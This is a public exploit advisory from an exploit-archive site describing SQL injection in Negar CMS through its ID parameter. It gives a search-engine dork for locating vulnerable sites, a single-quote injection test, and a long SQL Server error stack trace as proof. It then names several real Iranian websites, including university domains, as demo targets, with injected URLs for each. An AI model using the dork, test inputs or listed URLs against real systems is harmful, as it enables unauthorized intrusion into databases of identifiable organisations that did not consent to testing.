Negar CMS SQL INJECTION

2019.03.20
ir NikbinHK (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"Powered by NegarCMS"

# Exploit Title: Negar CMS SQL INJECTION # Date: 2019-03-20 # Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin # Vendor Homepage: http://www.negarcms.ir/ # Dork : intext:"Powered by NegarCMS" # Version: Final Version # Tested on: win,linux ================================================================================= [SQL injection] [+] Method ( Sql injection ) Nullix Security Team of IRan [+] parameter : ID= [-] To find the bug, place this in front of the site ['] or ' ================= Output : =========================================================================================================== Conversion failed when converting the nvarchar value '3'' to data type int. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value '3'' to data type int. Source Error: An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below. Stack Trace: [SqlException (0x80131904): Conversion failed when converting the nvarchar value '3'' to data type int.] System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +2552942 System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +5952492 System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) +285 System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) +4169 System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows) +240 System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more) +268 System.Data.SqlClient.SqlDataReader.Read() +34 System.Data.Common.DataAdapter.FillLoadDataRow(SchemaMapping mapping) +211 System.Data.Common.DataAdapter.FillFromReader(DataSet dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +197 System.Data.Common.DataAdapter.Fill(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +311 System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +170 System.Data.Common.DbDataAdapter.Fill(DataTable[] dataTables, Int32 startRecord, Int32 maxRecords, IDbCommand command, CommandBehavior behavior) +160 System.Data.Common.DbDataAdapter.Fill(DataTable dataTable) +108 ExtendedModules_Subjects_UI_Category.Page_Load(Object sender, EventArgs e) +1694 System.Web.UI.Control.OnLoad(EventArgs e) +95 System.Web.UI.Control.LoadRecursive() +59 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Control.LoadRecursive() +131 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +678 =========================================================================================================== ================================================================================= Demo: [+] http://www.iausk.ac.ir/Default.aspx?PageName=News&ID=[sql] [-]http://www.iausk.ac.ir/Default.aspx?PageName=News&ID=241%27 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> [+] https://www.iranhoshdar.ir/Default.aspx?PageNAme=Page&ID=[SQL] [-] https://www.iranhoshdar.ir/Default.aspx?PageNAme=Page&ID=%27 ======================================================= htcd.tums.ac.ir/94/default.aspx?PageName=showcompany&Action=detail&ID=194 =============================================================================== www.imedss.ir/Default.aspx?PageName=forms&formid=5024 [Line 37: formid = Request.QueryString("FormID")] =========================================================================================== =================================================================================


See this note in RAW Version
Vote for this issue:
88%
12%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top